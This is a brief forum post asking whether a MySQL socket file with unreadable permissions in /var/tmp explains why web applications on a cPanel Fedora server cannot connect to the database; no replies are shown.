I'm running a cpanel box with fedora and cannot connect to mysql from the web (Horde, phpmyadmin, java, etc...).

I looked at the permissions for mysql.sock in /var/tmp/ and this is what I found:

?--------- ? ? ? ? ? mysql.sock

I've never seen this and am wondering if this is the source of the problem?

View 3 Replies View Related







Copyrights 2005-15 www.BigResource.com, All rights reserved